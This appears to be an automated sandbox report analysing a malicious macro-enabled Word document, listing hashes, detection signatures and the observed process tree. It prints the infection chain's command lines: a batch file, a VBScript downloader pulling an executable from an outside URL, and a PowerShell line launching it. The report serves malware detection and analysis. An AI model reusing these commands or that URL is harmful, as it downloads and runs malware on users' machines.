Analysis
-
max time kernel
88s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-05-2022 00:03
Static task
static1
Behavioral task
behavioral1
Sample
3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
Resource
win10v2004-20220414-en
General
-
Target
3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm
-
Size
630KB
-
MD5
5bed84434cf10693e9928c949dc990ee
-
SHA1
2247d45b53195863c4361f81e4b7facfedb9f33b
-
SHA256
3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559
-
SHA512
a1dc22e6dad75603d096db8834012fb7b952126e908206650b261dd461cd098bd79b171d8374a80e89f53796b382a96f2f86b765fdabaa2b40f3283fd2e8b574
Malware Config
Signatures
-
Detected phishing page
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3024 4776 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
cscript.exeflow pid process 27 1740 cscript.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 260 4776 DW20.EXE WINWORD.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdwwin.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dwwin.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEdwwin.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwwin.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4776 WINWORD.EXE 4776 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
WINWORD.EXEpowershell.exepid process 4776 WINWORD.EXE 4776 WINWORD.EXE 4776 WINWORD.EXE 4776 WINWORD.EXE 5004 powershell.exe 5004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5004 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 4776 WINWORD.EXE 4776 WINWORD.EXE 4776 WINWORD.EXE 4776 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.exeDW20.EXEdescription pid process target process PID 4776 wrote to memory of 3024 4776 WINWORD.EXE cmd.exe PID 4776 wrote to memory of 3024 4776 WINWORD.EXE cmd.exe PID 4776 wrote to memory of 260 4776 WINWORD.EXE DW20.EXE PID 4776 wrote to memory of 260 4776 WINWORD.EXE DW20.EXE PID 3024 wrote to memory of 1740 3024 cmd.exe cscript.exe PID 3024 wrote to memory of 1740 3024 cmd.exe cscript.exe PID 260 wrote to memory of 4748 260 DW20.EXE dwwin.exe PID 260 wrote to memory of 4748 260 DW20.EXE dwwin.exe PID 3024 wrote to memory of 5004 3024 cmd.exe powershell.exe PID 3024 wrote to memory of 5004 3024 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ventilator-aer.ro/wp-content/uploads/2020/02/0303/ginndoe.jp C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 46762⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 46763⤵
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exeFilesize
2KB
MD5752b20d2159ddc689eb9deaa771a095b
SHA1307772a0bed3fbf19166493cad7d305d30cb7b2a
SHA256041ca869d8c500b245a1b32c330507351913f544e12f608b6d583eadb0f09507
SHA512b1d1be1e050247951dc8b50bb625053ca2434d4db1e1f2d897238911d5068e88429ddccb373591b9d0d6bfdb4864d50853be0d8ab7044cecda954dfb7f67a76f
-
C:\DiskDrive\1\Volume\BackFiles\pinumber.vbsFilesize
777B
MD5aaa0e8aad75d0ff7247f8a389d9e1b1c
SHA11e735b3ddb654cbefaa0fff7c2d8c8812dbaaf16
SHA256e1722cf4f9d9fff3e3b9bbc825c7d88256e8db18df1c125aeee6346a85ad1c3a
SHA512a75327cfcfb27cf8ade0ded3191eb4129490792dbc5058424a552e492abc96e31806ddd99fc64797e0d46a6dc816c913e7ec4e07f99a6747166237328608f125
-
C:\DiskDrive\1\Volume\errorfix.batFilesize
2KB
MD545e1c5c5bdd874c41b6316b196533bf0
SHA1e4cce2e1c47cb439116b5ace0e9a231b83c4c7c7
SHA256f9c76220ad7a43ab310dec13c868a8ae55fac4328b5322ea4945e23323abe574
SHA512185e5a7c77d5ce063180a97df0c09166b640adfd9e5fae0c18269f49101982b5b254cd9d92b7e15a8a6285bbc0b66a7ebb5e22f28ce867e141355c227e8ddd24
-
memory/260-150-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/260-140-0x0000000000000000-mapping.dmp
-
memory/260-151-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/260-152-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/260-149-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/1740-145-0x0000000000000000-mapping.dmp
-
memory/3024-138-0x0000000000000000-mapping.dmp
-
memory/4748-147-0x0000000000000000-mapping.dmp
-
memory/4776-133-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/4776-134-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/4776-132-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/4776-137-0x000002AE5F1F0000-0x000002AE5F1F4000-memory.dmpFilesize
16KB
-
memory/4776-130-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/4776-136-0x00007FF838D70000-0x00007FF838D80000-memory.dmpFilesize
64KB
-
memory/4776-135-0x00007FF838D70000-0x00007FF838D80000-memory.dmpFilesize
64KB
-
memory/4776-131-0x00007FF83B290000-0x00007FF83B2A0000-memory.dmpFilesize
64KB
-
memory/5004-153-0x0000000000000000-mapping.dmp
-
memory/5004-154-0x0000023E77080000-0x0000023E770A2000-memory.dmpFilesize
136KB
-
memory/5004-155-0x00007FF85B7F0000-0x00007FF85C2B1000-memory.dmpFilesize
10.8MB